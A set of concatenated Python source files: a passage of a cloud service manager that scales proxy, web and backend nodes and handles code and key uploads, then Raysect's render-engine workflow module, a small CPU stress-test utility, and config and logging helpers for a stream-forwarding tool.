web = int(kwargs.pop('web'))
if web < 0: return HttpErrorResponse(ManagerException(ManagerException.E_ARGS_INVALID, detail='Expected a positive integer value for "web"').message)
if 'proxy' in kwargs:
if not isinstance(kwargs['proxy'], int):
return HttpErrorResponse(ManagerException(ManagerException.E_ARGS_INVALID, detail='Expected an integer value for "proxy"').message)
proxy = int(kwargs.pop('proxy'))
if proxy < 0: return HttpErrorResponse(ManagerException(ManagerException.E_ARGS_INVALID, detail='Expected a positive integer value for "proxy"').message)
if (backend + web + proxy) < 1:
return HttpErrorResponse(ManagerException(ManagerException.E_ARGS_MISSING, ['backend', 'web', 'proxy'], detail='Need a positive value for at least one').message)
if (proxy + config.proxy_count) > 1 and ( (web + config.web_count) == 0 or (backend + config.backend_count) == 0 ):
return HttpErrorResponse(ManagerException(ManagerException.E_ARGS_INVALID, detail='Cannot add more proxy servers without at least one "web" and one "backend"').message)
self._state_set(self.S_ADAPTING, msg='Going to add proxy=%d, web=%d, backend=%d' % (proxy, web, backend))
Thread(target=self.do_add_nodes, args=[config, proxy, web, backend, kwargs['cloud']]).start()
return HttpJsonResponse()
def do_add_nodes(self, config, proxy, web, backend, cloud):
webNodesNew = []
proxyNodesNew = []
backendNodesNew = []
webNodesKill = []
backendNodesKill = []
try:
cloud = self._init_cloud(cloud)
except Exception:
self.logger.exception("A cloud named '%s' could not be found" % cloud)
self._state_set(self.S_RUNNING, msg='Unknown cloud: %s' % cloud)
return
if backend > 0 and config.backend_count == 0:
backendNodesKill.append(config.getBackendServiceNodes()[0])
if web > 0 and config.web_count == 0:
webNodesKill.append(config.getWebServiceNodes()[0])
for _ in range(backend): backendNodesNew.append({'runBackend':True})
for _ in range(web): webNodesNew.append({'runWeb':True})
for _ in range(proxy): proxyNodesNew.append({'runProxy':True})
for i in webNodesKill: i.isRunningWeb = False
for i in backendNodesKill: i.isRunningBackend = False
newNodes = []
try:
self._adapting_set_count(len(proxyNodesNew) + len(webNodesNew) + len(backendNodesNew))
node_instances = self.controller.create_nodes(len(proxyNodesNew) + len(webNodesNew) + len(backendNodesNew),
client.check_agent_process, 5555, cloud)
except:
self.logger.exception('do_add_nodes: Failed to request new nodes. Needed %d' % (len(proxyNodesNew + webNodesNew + backendNodesNew)))
self._state_set(self.S_RUNNING, msg='Failed to request new nodes. Reverting to old configuration')
return
finally:
self._adapting_set_count(0)
i = 0
for kwargs in proxyNodesNew + webNodesNew + backendNodesNew:
config.serviceNodes[node_instances[i].id] = WebServiceNode(node_instances[i], **kwargs)
newNodes += [ config.serviceNodes[node_instances[i].id] ]
i += 1
config.update_mappings()
# create new service nodes
self._start_backend(config, [ node for node in newNodes if node.isRunningBackend ])
# stage code files in all new VMs
# NOTE: Code update is done after starting the backend
# because tomcat-create-instance complains if its
# directory exists when it is run and placing the
# code can only be done after creating the instance
if config.currentCodeVersion != None:
self._update_code(config, [ node for node in newNodes if node not in config.serviceNodes ])
self._start_web(config, [ node for node in newNodes if node.isRunningWeb ])
self._start_proxy(config, [ node for node in newNodes if node.isRunningProxy ])
# update services
if webNodesNew or backendNodesNew:
self._update_proxy(config, [ i for i in config.serviceNodes.values() if i.isRunningProxy and i not in newNodes ])
# remove_nodes old ones
self._stop_backend(config, backendNodesKill)
self._stop_web(config, webNodesKill)
config.proxy_count = len(config.getProxyServiceNodes())
config.backend_count = len(config.getBackendServiceNodes())
if config.backend_count == 1 and config.getBackendServiceNodes()[0] in config.getProxyServiceNodes():
config.backend_count = 0
config.web_count = len(config.getWebServiceNodes())
if config.web_count == 1 and config.getWebServiceNodes()[0] in config.getProxyServiceNodes():
config.web_count = 0
self._state_set(self.S_RUNNING)
self._configuration_set(config)
self.memcache.set('nodes_additional', [])
@expose('POST')
def remove_nodes(self, kwargs):
config = self._configuration_get()
backend = 0
web = 0
proxy = 0
if 'backend' in kwargs:
if not isinstance(kwargs['backend'], int):
return HttpErrorResponse(ManagerException(ManagerException.E_ARGS_INVALID, detail='Expected an integer value for "backend"').message)
backend = int(kwargs.pop('backend'))
if backend < 0: return HttpErrorResponse(ManagerException(ManagerException.E_ARGS_INVALID, detail='Expected a positive integer value for "backend"').message)
if 'web' in kwargs:
if not isinstance(kwargs['web'], int):
return HttpErrorResponse(ManagerException(ManagerException.E_ARGS_INVALID, detail='Expected an integer value for "web"').message)
web = int(kwargs.pop('web'))
if web < 0: return HttpErrorResponse(ManagerException(ManagerException.E_ARGS_INVALID, detail='Expected a positive integer value for "web"').message)
if 'proxy' in kwargs:
if not isinstance(kwargs['proxy'], int):
return HttpErrorResponse(ManagerException(ManagerException.E_ARGS_INVALID, detail='Expected an integer value for "proxy"').message)
proxy = int(kwargs.pop('proxy'))
if proxy < 0: return HttpErrorResponse(ManagerException(ManagerException.E_ARGS_INVALID, detail='Expected a positive integer value for "proxy"').message)
if (backend + web + proxy) < 1:
return HttpErrorResponse(ManagerException(ManagerException.E_ARGS_MISSING, ['backend', 'web', 'proxy'], detail='Need a positive value for at least one').message)
if len(kwargs) != 0:
return HttpErrorResponse(ManagerException(ManagerException.E_ARGS_UNEXPECTED, kwargs.keys()).message)
if config.proxy_count - proxy < 1: return HttpErrorResponse(ManagerException(ManagerException.E_ARGS_INVALID, detail='Not enough proxy nodes will be left').message)
if config.web_count - web < 1 and config.proxy_count - proxy > 1:
return HttpErrorResponse(ManagerException(ManagerException.E_ARGS_INVALID, detail='Not enough web nodes will be left').message)
if config.web_count - web < 0: return HttpErrorResponse(ManagerException(ManagerException.E_ARGS_INVALID, detail='Cannot remove_nodes that many web nodes').message)
if config.backend_count - backend < 1 and config.proxy_count - proxy > 1:
return HttpErrorResponse(ManagerException(ManagerException.E_ARGS_INVALID, detail='Not enough backend nodes will be left').message)
if config.backend_count - backend < 0:
return HttpErrorResponse(ManagerException(ManagerException.E_ARGS_INVALID, detail='Cannot remove_nodes that many backend nodes').message)
dstate = self._state_get()
if dstate != self.S_RUNNING:
return HttpErrorResponse(ManagerException(ManagerException.E_STATE_ERROR).message)
self._state_set(self.S_ADAPTING, msg='Going to remove_nodes proxy=%d, web=%d, backend=%d' %(proxy, web, backend))
Thread(target=self.do_remove_nodes, args=[config, proxy, web, backend]).start()
return HttpJsonResponse()
def do_remove_nodes(self, config, proxy, web, backend):
packBackend = False
packWeb = False
packingNode = None
backendNodesKill = []
webNodesKill = []
proxyNodesKill = []
if web > 0:
webNodesKill += config.getWebServiceNodes()[-web:]
if config.web_count - web == 0:
packWeb = True
if backend > 0:
backendNodesKill += config.getBackendServiceNodes()[-backend:]
if config.backend_count - backend == 0:
packBackend = True
if proxy > 0:
proxyNodesKill += config.getProxyServiceNodes()[-proxy:]
packingNode = config.getProxyServiceNodes()[0]
for i in webNodesKill: i.isRunningWeb = False
for i in backendNodesKill: i.isRunningBackend = False
for i in proxyNodesKill: i.isRunningProxy = False
if packBackend: packingNode.isRunningBackend = True
if packWeb: packingNode.isRunningWeb = True
config.update_mappings()
# new nodes
if packBackend:
# NOTE: Code update is done after starting the backend
# because tomcat-create-instance complains if its
# directory exists when it is run and placing the
# code can only be done after creating the instance
self._start_backend(config, [packingNode])
self._update_code(config, [packingNode])
if packWeb: self._start_web(config, [packingNode])
if webNodesKill or backendNodesKill:
self._update_proxy(config, [ i for i in config.serviceNodes.values() if i.isRunningProxy and i not in proxyNodesKill ])
# remove_nodes nodes
self._stop_backend(config, backendNodesKill)
self._stop_web(config, webNodesKill)
self._stop_proxy(config, proxyNodesKill)
for i in config.serviceNodes.values():
if not i.isRunningBackend and not i.isRunningWeb and not i.isRunningProxy:
del config.serviceNodes[i.id]
self.controller.delete_nodes([i])
config.proxy_count = len(config.getProxyServiceNodes())
config.backend_count = len(config.getBackendServiceNodes())
if config.backend_count == 1 and config.getBackendServiceNodes()[0] in config.getProxyServiceNodes():
config.backend_count = 0
config.web_count = len(config.getWebServiceNodes())
if config.web_count == 1 and config.getWebServiceNodes()[0] in config.getProxyServiceNodes():
config.web_count = 0
self._state_set(self.S_RUNNING)
self._configuration_set(config)
@expose('GET')
def list_nodes(self, kwargs):
if len(kwargs) != 0:
return HttpErrorResponse(ManagerException(ManagerException.E_ARGS_UNEXPECTED, kwargs.keys()).message)
dstate = self._state_get()
if dstate != self.S_RUNNING and dstate != self.S_ADAPTING:
return HttpErrorResponse(ManagerException(ManagerException.E_STATE_ERROR).message)
config = self._configuration_get()
return HttpJsonResponse({
'proxy': [ serviceNode.id for serviceNode in config.getProxyServiceNodes() ],
'web': [ serviceNode.id for serviceNode in config.getWebServiceNodes() ],
'backend': [ serviceNode.id for serviceNode in config.getBackendServiceNodes() ]
})
@expose('GET')
def get_node_info(self, kwargs):
if 'serviceNodeId' not in kwargs: return HttpErrorResponse(ManagerException(ManagerException.E_ARGS_MISSING, 'serviceNodeId').message)
serviceNodeId = kwargs.pop('serviceNodeId')
if len(kwargs) != 0:
return HttpErrorResponse(ManagerException(ManagerException.E_ARGS_UNEXPECTED, kwargs.keys()).message)
config = self._configuration_get()
if serviceNodeId not in config.serviceNodes: return HttpErrorResponse(ManagerException(ManagerException.E_ARGS_INVALID, detail='Invalid "serviceNodeId"').message)
serviceNode = config.serviceNodes[serviceNodeId]
return HttpJsonResponse({
'serviceNode': {
'id': serviceNode.id,
'ip': serviceNode.ip,
'isRunningProxy': serviceNode.isRunningProxy,
'isRunningWeb': serviceNode.isRunningWeb,
'isRunningBackend': serviceNode.isRunningBackend,
}
})
@expose('GET')
def list_authorized_keys(self, kwargs):
if len(kwargs) != 0:
return HttpErrorResponse(ManagerException(ManagerException.E_ARGS_UNEXPECTED, kwargs.keys()).message)
return HttpJsonResponse({ 'authorizedKeys': git.get_authorized_keys() })
@expose('GET')
def list_code_versions(self, kwargs):
if len(kwargs) != 0:
return HttpErrorResponse(ManagerException(ManagerException.E_ARGS_UNEXPECTED, kwargs.keys()).message)
config = self._configuration_get()
versions = []
for version in config.codeVersions.values():
item = {'codeVersionId': version.id, 'filename': version.filename, 'description': version.description, 'time': version.timestamp}
if version.id == config.currentCodeVersion: item['current'] = True
versions.append(item)
versions.sort(cmp=(lambda x, y: cmp(x['time'], y['time'])), reverse=True)
return HttpJsonResponse({'codeVersions': versions})
@expose('GET')
def download_code_version(self, kwargs):
if 'codeVersionId' not in kwargs:
return HttpErrorResponse(ManagerException(ManagerException.E_ARGS_MISSING, 'codeVersionId').message)
if isinstance(kwargs['codeVersionId'], dict):
return HttpErrorResponse(ManagerException(ManagerException.E_ARGS_INVALID, detail='codeVersionId should be a string').message)
codeVersion = kwargs.pop('codeVersionId')
if len(kwargs) != 0:
return HttpErrorResponse(ManagerException(ManagerException.E_ARGS_UNEXPECTED, kwargs.keys()).message)
config = self._configuration_get()
if codeVersion not in config.codeVersions:
return HttpErrorResponse(ManagerException(ManagerException.E_ARGS_INVALID, detail='Invalid codeVersionId').message)
filename = os.path.abspath(os.path.join(self.code_repo, codeVersion))
if not filename.startswith(self.code_repo + '/') or not os.path.exists(filename):
return HttpErrorResponse(ManagerException(ManagerException.E_ARGS_INVALID, detail='Invalid codeVersionId').message)
return HttpFileDownloadResponse(config.codeVersions[codeVersion].filename, filename)
@expose('UPLOAD')
def upload_code_version(self, kwargs):
if 'code' not in kwargs:
return HttpErrorResponse(ManagerException(ManagerException.E_ARGS_MISSING, 'code').message)
code = kwargs.pop('code')
if 'description' in kwargs: description = kwargs.pop('description')
else: description = ''
if len(kwargs) != 0:
return HttpErrorResponse(ManagerException(ManagerException.E_ARGS_UNEXPECTED, kwargs.keys()).message)
if not isinstance(code, FileUploadField):
return HttpErrorResponse(ManagerException(ManagerException.E_ARGS_INVALID, detail='codeVersionId should be a file').message)
config = self._configuration_get()
fd, name = tempfile.mkstemp(prefix='code-', dir=self.code_repo)
fd = os.fdopen(fd, 'w')
upload = code.file
codeVersionId = os.path.basename(name)
bytes = upload.read(2048)
while len(bytes) != 0:
fd.write(bytes)
bytes = upload.read(2048)
fd.close()
arch = archive_open(name)
if arch == None:
os.remove(name)
return HttpErrorResponse(ManagerException(ManagerException.E_ARGS_INVALID, detail='Invalid archive format').message)
for fname in archive_get_members(arch):
if fname.startswith('/') or fname.startswith('..'):
archive_close(arch)
os.remove(name)
return HttpErrorResponse(ManagerException(ManagerException.E_ARGS_INVALID, detail='Absolute file names are not allowed in archive members').message)
archive_close(arch)
config.codeVersions[codeVersionId] = CodeVersion(codeVersionId, os.path.basename(code.filename), archive_get_type(name), description=description)
self._configuration_set(config)
return HttpJsonResponse({'codeVersionId': os.path.basename(codeVersionId)})
@expose('UPLOAD')
def upload_authorized_key(self, kwargs):
if 'key' not in kwargs:
return HttpErrorResponse(ManagerException(ManagerException.E_ARGS_MISSING, 'key').message)
key = kwargs.pop('key')
if len(kwargs) != 0:
return HttpErrorResponse(ManagerException(ManagerException.E_ARGS_UNEXPECTED, kwargs.keys()).message)
if not isinstance(key, FileUploadField):
return HttpErrorResponse(ManagerException(ManagerException.E_ARGS_INVALID, detail='key should be a file').message)
key_lines = key.file.readlines()
num_added = git.add_authorized_keys(key_lines)
return HttpJsonResponse({'outcome': "%s keys added to authorized_keys" % num_added })
@expose('GET')
def get_service_performance(self, kwargs):
if len(kwargs) != 0:
return HttpErrorResponse(ManagerException(ManagerException.E_ARGS_UNEXPECTED, kwargs.keys()).message)
return HttpJsonResponse({
'request_rate': 0,
'error_rate': 0,
'throughput': 0,
'response_time': 0,
})
@expose('POST')
def git_push_hook(self, kwargs):
if len(kwargs) != 0:
return HttpErrorResponse(ManagerException(ManagerException.E_ARGS_UNEXPECTED, kwargs.keys()).message)
config = self._configuration_get()
repo = git.DEFAULT_CODE_REPO
codeVersionId = git.git_code_version(repo)
config.codeVersions[codeVersionId] = CodeVersion(id=codeVersionId,
filename=codeVersionId,
atype="git",
description=git.git_last_description(repo))
self._configuration_set(config)
return HttpJsonResponse({ 'codeVersionId': codeVersionId })
@expose('GET')
def get_service_history(self, kwargs):
if len(kwargs) != 0:
return HttpErrorResponse(ManagerException(ManagerException.E_ARGS_UNEXPECTED, kwargs.keys()).message)
return HttpJsonResponse({'state_log': self.state_log})
@expose('GET')
def getSummerSchool(self, kwargs):
pac = self.memcache.get_multi([self.DEPLOYMENT_STATE, self.CONFIG, 'adapting_count', 'nodes_additional'])
ret = [pac[self.DEPLOYMENT_STATE], len(pac[self.CONFIG].serviceNodes)]
if 'adapting_count' in pac: ret += [pac['adapting_count']]
else: ret += [0]
nodes = [ i.id for i in pac[self.CONFIG].serviceNodes.values() ]
if 'nodes_additional' in pac: nodes += pac['nodes_additional']
ret += [str(nodes)]
return ret
def upload_script(self, kwargs, filename):
"""Write the file uploaded in kwargs['script'] to filesystem.
Return the script absoulte path on success, HttpErrorResponse on
failure.
"""
self.logger.debug("upload_script: called with filename=%s" % filename)
# Check if the required argument 'script' is present
if 'script' not in kwargs:
return HttpErrorResponse(ManagerException(
ManagerException.E_ARGS_MISSING, 'script').message)
script = kwargs.pop('script')
# Check if any trailing parameter has been submitted
if len(kwargs) != 0:
return HttpErrorResponse(ManagerException(
ManagerException.E_ARGS_UNEXPECTED, kwargs.keys()).message)
# Script has to be a FileUploadField
if not isinstance(script, FileUploadField):
return HttpErrorResponse(ManagerException(
ManagerException.E_ARGS_INVALID, detail='script should be a file').message)
basedir = self.config_parser.get('manager', 'CONPAAS_HOME')
fullpath = os.path.join(basedir, filename)
# Write the uploaded script to filesystem
open(fullpath, 'w').write(script.file.read())
self.logger.debug("upload_script: script uploaded successfully to '%s'"
% fullpath)
# Return the script absolute path
return fullpath
@expose('UPLOAD')
def upload_startup_script(self, kwargs):
ret = self.upload_script(kwargs, 'startup.sh')
if type(ret) is HttpErrorResponse:
# Something went wrong. Return the error
return ret
# Rebuild context script
self.controller.generate_context("web")
# All is good. Return the filename of the uploaded script
return HttpJsonResponse({ 'filename': ret })
@expose('GET')
def get_startup_script(self, kwargs):
"""Return contents of the currently defined startup script, if any"""
basedir = self.config_parser.get('manager', 'CONPAAS_HOME')
fullpath = os.path.join(basedir, 'startup.sh')
try:
return HttpJsonResponse(open(fullpath).read())
except IOError:
return HttpErrorResponse('No startup script')
@expose('UPLOAD')
def upload_adhoc_script(self, kwargs):
# TODO
# pop all the arguments besides 'script' from kwargs.
ret = self.upload_script(kwargs, 'adhoc.sh')
if type(ret) is HttpErrorResponse:
# Something went wrong. Return the error
return ret
# TODO
# All is good. Run the script on the specified subset of machines
|
workflow.py
|
# Copyright (c) 2014-2021, Dr Alex Meakins, Raysect Project
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# 3. Neither the name of the Raysect Project nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
from multiprocessing import get_context, cpu_count
from raysect.core.math import random
import time
class RenderEngine:
"""
Provides a common rendering workflow interface.
This is a base class, its functionality must be implemented fully by the deriving class.
This class provides a rendering workflow that abstracts away the underlying
system performing the work. It is intended that render engines may be built
that provide rendering on single cores, multi-cores (SMP) and clusters.
The basic workflow is as follows. The render task is split into small,
self-contained chunks of work - 'tasks'. These tasks are passed to the
render engine which distributes the work to the available computing
resources. These discrete computing resources are know as "workers".
Workers process one task at a time and return their result to the render
engine. When results are received the render engine assembles them into
the final result.
This workflow is implemented by supplying a set of tasks and two methods to
the render engines' run() method which processes those tasks. The functions
supplied to the run() method may be given additional args and kwargs.
A worker calls render for each task object received. render has the following signature: ::
def render(task, *render_args, **render_kwargs)
where args and kwargs are additional arguments supplied by the user.
Similarly, the worker calls update() for the results generated by a call to
render(). Update() has the following signature: ::
def update(results, *update_args, **update_kwargs)
where args and kwargs are additional arguments supplied by the user.
The render() function must return an object representing the results,
this must be a picklable python object.
The execution order of tasks is not guaranteed to be in order. If the order
is critical, an identifier should be passed as part of the task definition
and returned in the result. This will permit the order to be reconstructed.
"""
def run(self, tasks, render, update, render_args=(), render_kwargs={}, update_args=(), update_kwargs={}):
"""
Starts the render engine executing the requested tasks.
:param list tasks: List of user defined tuples that describe the task to execute.
:param object render: Callable python object that executes the tasks.
:param object update: Callable python object that is called following a render task and must be
used to update the internal state of the object requesting work.
:param tuple render_args: Additional arguments to pass to user defined render function.
:param tuple render_kwargs: Additional keyword arguments to pass to user defined render function.
:param tuple update_args: Additional arguments to pass to user defined update function.
:param tuple update_kwargs: Additional keyword arguments to pass to user defined update function.
"""
raise NotImplementedError("Virtual method must be implemented in sub-class.")
def worker_count(self):
"""
Returns the number of workers in use by this engine.
"""
raise NotImplementedError("Virtual method must be implemented in sub-class.")
class SerialEngine(RenderEngine):
"""
Render engine for running on a single CPU processor.
This engine is useful for debugging.
>>> from raysect.core import SerialEngine
>>> from raysect.optical.observer import PinholeCamera
>>>
>>> camera = PinholeCamera((512, 512))
>>> camera.render_engine = SerialEngine()
"""
def run(self, tasks, render, update, render_args=(), render_kwargs={}, update_args=(), update_kwargs={}):
for task in tasks:
result = render(task, *render_args, **render_kwargs)
update(result, *update_args, **update_kwargs)
def worker_count(self):
return 1
class MulticoreEngine(RenderEngine):
"""
A render engine for distributing work across multiple CPU cores.
The number of processes spawned by this render engine is controlled via
the processes attribute. This can also be set at object initialisation.
If the processes attribute is set to None (the default), the render engine
will automatically set the number of processes to be equal to the number
of CPU cores detected on the machine.
If a render is being performed where the time to compute an individual task
is comparable to the latency of the inter process communication (IPC), the
render may run significantly slower than expected due to waiting for the
IPC to complete. To reduce the impact of the IPC overhead, multiple tasks
are grouped together into jobs, requiring only one IPC wait for multiple
tasks.
By default the number of tasks per job is adjusted automatically. The
tasks_per_job attribute can be used to override this automatic adjustment.
To reenable the automated adjustment, set the tasks_per_job attribute to
None.
:param processes: The number of worker processes, or None to use all available cores (default).
:param tasks_per_job: The number of tasks to group into a single job, or None if this should be determined automatically (default).
:param start_method: The method used to start child processes: 'fork' (default), 'spawn' or 'forkserver'.
.. code-block:: pycon
>>> from raysect.core import MulticoreEngine
>>> from raysect.optical.observer import PinholeCamera
>>>
>>> camera = PinholeCamera((512, 512))
>>>
>>> # allowing the camera to use all available CPU cores.
>>> camera.render_engine = MulticoreEngine()
>>>
>>> # or forcing the render engine to use a specific number of CPU processes
>>> camera.render_engine = MulticoreEngine(processes=8)
"""
def __init__(self, processes=None, tasks_per_job=None, start_method='fork'):
super().__init__()
self.processes = processes
self.tasks_per_job = tasks_per_job
self._context = get_context(start_method)
@property
def processes(self):
return self._processes
@processes.setter
def processes(self, value):
if value is None:
self._processes = cpu_count()
else:
value = int(value)
if value <= 0:
raise ValueError('Number of concurrent worker processes must be greater than zero.')
self._processes = value
@property
def tasks_per_job(self):
return self._tasks_per_job
@tasks_per_job.setter
def tasks_per_job(self, value):
if value is None:
self._tasks_per_job = 1
self._auto_tasks_per_job = True
else:
if value < 1:
raise ValueError("The number of tasks per job must be greater than zero or None.")
self._tasks_per_job = value
self._auto_tasks_per_job = False
def run(self, tasks, render, update, render_args=(), render_kwargs={}, update_args=(), update_kwargs={}):
# establish ipc queues
job_queue = self._context.SimpleQueue()
result_queue = self._context.SimpleQueue()
tasks_per_job = self._context.Value('i')
# start process to generate jobs
tasks_per_job.value = self._tasks_per_job
producer = self._context.Process(target=self._producer, args=(tasks, job_queue, tasks_per_job))
producer.start()
# start worker processes
workers = []
for pid in range(self._processes):
p = self._context.Process(target=self._worker, args=(render, render_args, render_kwargs, job_queue, result_queue))
p.start()
workers.append(p)
# consume results
remaining = len(tasks)
while remaining:
results = result_queue.get()
# has a worker failed?
if isinstance(results, Exception):
# clean up
for worker in workers:
if worker.is_alive():
worker.terminate()
producer.terminate()
# wait for processes to terminate
for worker in workers:
worker.join()
producer.join()
# raise the exception to inform the user
raise results
# update state with new results
for result in results:
update(result, *update_args, **update_kwargs)
remaining -= 1
# shutdown workers
for _ in workers:
job_queue.put(None)
# store tasks per job value for next run
self._tasks_per_job = tasks_per_job.value
def worker_count(self):
return self._processes
def _producer(self, tasks, job_queue, stored_tasks_per_job):
# initialise request rate controller constants
target_rate = 50 # requests per second
min_time = 1 # seconds
min_requests = min(2 * target_rate, 5 * self._processes)
tasks_per_job = stored_tasks_per_job.value
# split tasks into jobs and dispatch to workers
requests = -self.processes # ignore the initial jobs, the requests are instantaneous
start_time = time.time()
while tasks:
# assemble job
job = []
for _ in range(tasks_per_job):
if tasks:
job.append(tasks.pop())
continue
break
# add job to queue
job_queue.put(job)
requests += 1
# if enabled, auto adjust tasks per job to keep target requests per second
if self._auto_tasks_per_job:
elapsed_time = (time.time() - start_time)
if elapsed_time > min_time and requests > min_requests:
# re-normalise the tasks per job based on previous work to propose a new value
requests_rate = requests / elapsed_time
proposed = tasks_per_job * requests_rate / target_rate
# gradually adjust tasks per job to reduce risk of oscillation
tasks_per_job = 0.1 * proposed + 0.9 * tasks_per_job
tasks_per_job = max(1, round(tasks_per_job))
# reset counters
requests = 0
start_time = time.time()
# pass back new value
stored_tasks_per_job.value = tasks_per_job
def _worker(self, render, args, kwargs, job_queue, result_queue):
# re-seed the random number generator to prevent all workers inheriting the same sequence
random.seed()
# process jobs
while True:
job = job_queue.get()
# have we been commanded to shutdown?
if job is None:
break
results = []
for task in job:
try:
results.append(render(task, *args, **kwargs))
except Exception as e:
# pass the exception back to the main process and quit
result_queue.put(e)
break
# hand back results
result_queue.put(results)
if __name__ == '__main__':
class Job:
def __init__(self, engine=None):
self.total = 0
self.engine = engine if engine else MulticoreEngine()
def run(self, v):
self.total = 0
self.engine.run(list(range(v)), self.render, self.update, render_args=(10000,))
return self.total
def render(self, task, count):
sum = 0
for i in range(count):
sum += 1 / count
return sum
def update(self, result):
self.total += result
n = 20000
t = time.time()
j = Job(SerialEngine())
print(j.run(n), time.time() - t)
t = time.time()
j = Job(MulticoreEngine())
print(j.run(n), time.time() - t)
|
pystress.py
|
__version__ = '0.2.1'
from multiprocessing import Process, active_children, cpu_count, Pipe
import os
import signal
import sys
import time
FIB_N = 100
DEFAULT_TIME = 60
try:
DEFAULT_CPU = cpu_count()
except NotImplementedError:
DEFAULT_CPU = 1
def loop(conn):
proc_info = os.getpid()
conn.send(proc_info)
conn.close()
while True:
fib(FIB_N)
def fib(n):
if n < 2:
return 1
else:
return fib(n - 1) + fib(n - 2)
def sigint_handler(signum, frame):
procs = active_children()
for p in procs:
p.terminate()
os._exit(1)
signal.signal(signal.SIGINT, sigint_handler)
def get_args():
exec_time = DEFAULT_TIME
proc_num = DEFAULT_CPU
if len(sys.argv) > 3:
raise
if len(sys.argv) == 2:
exec_time = int(sys.argv[1])
if len(sys.argv) == 3:
exec_time = int(sys.argv[1])
proc_num = int(sys.argv[2])
return exec_time, proc_num
def _main():
try:
exec_time, proc_num = get_args()
except Exception:
msg = "Usage: pystress [exec_time] [proc_num]\n"
sys.stderr.write(msg)
sys.exit(1)
pystress(exec_time, proc_num)
def pystress(exec_time, proc_num):
procs = []
conns = []
for _ in range(proc_num):
parent_conn, child_conn = Pipe()
p = Process(target=loop, args=(child_conn,))
p.start()
procs.append(p)
conns.append(parent_conn)
for conn in conns:
try:
print(conn.recv())
except EOFError:
continue
time.sleep(exec_time)
for p in procs:
p.terminate()
if __name__ == "__main__":
_main()
|
utitls.py
|
import hmac
import hashlib
import secrets
import json
import datetime
import traceback
import re
import signal, psutil
import threading
K_MANUAL_JSON_PATH = 'manualRestream.json'
K_CONFIG_JSON_PATH = 'config.json'
k_LOG_PATH = 'mainLog.log'
def myLogger(logStr):
resStr = str(datetime.datetime.now()) + " [MyLOGGER] " + str(logStr)
try:
print(resStr)
except Exception as e:
print(e)
with open(k_LOG_PATH, 'a+', encoding='utf-8') as tmpFile:
tmpFile.write(resStr + '\n')
def verifySecert(verifyMsg, i_msg):
i_msg = str.encode(i_msg) if isinstance(i_msg, str) else i_msg
key = configJson().get('subSecert', '')
key = str.encode(key)
hexdig = hmac.new(key, msg=i_msg, digestmod=hashlib.sha1).hexdigest()
print(verifyMsg, hexdig)
return verifyMsg == hexdig
def remove_emoji(text):
emoji_pattern = re.compile("["
u"\U0001F600-\U0001F64F" # emoticons
u"\U0001F300-\U0001F5FF" # symbols & pictographs
u"\U0001F680-\U0001F6FF" # transport & map symbols
u"\U0001F1E0-\U0001F1FF" # flags (iOS)
u"\U00002700-\U000027BF" # Dingbats
"]+", flags=re.UNICODE)
return emoji_pattern.sub(r'', text)
def kill_child_processes(parent_pid, sig=signal.SIGTERM):
try:
parent = psutil.Process(parent_pid)
except psutil.NoSuchProcess:
return
children = parent.children(recursive=True)
for process in children:
process.send_signal(sig)
def checkIsSupportForwardLink(forwardLink):
check_list = [
'.m3u8',
'twitcasting.tv/',
'youtube.com/', 'youtu.be/',
'twitch.tv/',
'showroom-live.com/',
'openrec.tv/'
]
for word in check_list:
if word in forwardLink:
return True
return False
def configJson():
with open(K_CONFIG_JSON_PATH, 'r', encoding='utf-8') as f:
configDict = json.loads(f.read())
# greate the secerts key
if configDict.get('subSecert') == "":
configDict['subSecert'] = secrets.token_hex(16)
saveConfigJson(configDict)
return configDict
def getSubInfosWithSubChannelId(channelId):
ret_list = []
confDict = configJson()
for subscribe in confDict.get('subscribeList', []):
if channelId in subscribe.get('youtubeChannelId', "").split(','):
if channelId != "":
ret_list.append(subscribe)
return ret_list
def getSubInfosWithSubTwitterId(twitterId):
ret_list = []
confDict = configJson()
for subscribe in confDict.get('subscribeList', []):
if twitterId in subscribe.get('twitterId', "").split(','):
if twitterId != "":
ret_list.append(subscribe)
return ret_list
def getSubWithKey(key, val):
ret = None
for subscribe in configJson().get('subscribeList', []):
if subscribe.get(key) == val:
ret = subscribe
break
return ret
def setSubInfoWithKey(key, val, subDict):
confDict = configJson()
for subscribe in confDict.get('subscribeList', []):
if subscribe.get(key) == val:
subscribe.update(subDict)
saveConfigJson(confDict)
return
def saveConfigJson(config_dict):
with open(K_CONFIG_JSON_PATH, 'w', encoding='utf-8') as wf:
json.dump(config_dict, wf, indent=4, sort_keys=True)
def addManualSrc(srcNote, srcLink):
tmp_dict = manualJson()
src_dict = tmp_dict.get('src_dict', {})
src_dict[srcNote] = srcLink
tmp_dict['src_dict'] = src_dict
saveManualJson(tmp_dict)
def addManualDes(desNote, desLink):
tmp_dict = manualJson()
des_dict = tmp_dict.get('des_dict', {})
des_dict[desNote] = desLink
tmp_dict['des_dict'] = des_dict
saveManualJson(tmp_dict)
def manualJson():
manualDict = {"src_dict":{}, "des_dict":{}}
try:
with open(K_MANUAL_JSON_PATH, 'r', encoding='utf-8') as f:
manualDict = json.loads(f.read())
except FileNotFoundError:
